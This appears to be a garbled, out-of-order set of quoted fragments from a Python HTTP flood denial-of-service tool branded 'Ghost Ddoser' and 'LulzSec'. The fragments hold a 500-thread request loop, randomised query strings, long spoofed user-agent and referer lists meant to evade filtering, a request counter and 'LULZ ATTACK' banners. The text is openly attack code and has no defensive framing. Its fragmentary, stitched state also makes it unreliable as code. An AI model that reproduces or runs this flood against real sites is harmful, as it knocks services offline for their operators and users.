bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random", "'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except", "headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=')", "// ~~ _// _// _// ~ _// ~ ~ / / / /", "Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR", "Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')", "Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit()", "2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)')", "~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\"", "Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3)", "Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac", "Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\"", "CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64;", "headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020')", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android", "'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try:", "ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v", "(Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach')", "intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev;", "2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')", "Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)')", "x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR", "iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)')", "en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=')", "(http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "\\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\", "MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80", "en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille", "10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append('", "Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online", "Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot", "UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel')", "rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016')", "Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen')", "host = m.group(1) for i in range(500): t = HTTPThread() t.start() t =", "CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot", "headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4", "keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox", "pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot;", "7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300", "keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus')", "NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1;", "Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista", "buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers)", "keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' +", ",. . ,' :: /`-._| | | || ' : `.`.) _,' |;._::", "headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech", "Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx]", "(Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like", "generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=')", "Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android;", "__..--'; : : / ( ;|;-./_ _/.-:'o | / ' | / ,", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like", "| : / `'-'--'----'---------' | | : O ._O O_. O ._O O_.", "V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>')", "Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606')", "Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows", "7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows", "size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra", "4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile;", "1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')", "Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko)", "(+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)')", "Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi')", "(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1;", "/ / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url):", "spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus", "2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0", "LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/':", "request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request)", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6')", "Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0", "libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')", "(www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine", "Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1')", "previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage()", "headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants')", "Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36", "request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates", "meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0;", "(X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36", "Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta", "'[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print", "Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR", "\\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`.", "headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729;", "def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le", "| | | : \\ `--. ) /|-._: : | \\ \\ /", "Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0", "headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo", "headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot", "|| ' : `.`.) _,' |;._:: | | | | `| : `'", "(Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", ",' \\ /-._; | : : :: ,. . ,' :: /`-._| |", "headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible;", "headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search", "(Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)')", "en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML,", "code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http", "dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0')", "x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x", "\"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute", "like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,", "libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55", "Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible;", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "; | | | : \\ `--. ) /|-._: : | \\ \\", "headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail:", "S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple", "(Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5", "(Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By", "SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;", "10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2;", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET", "headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop", "headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') 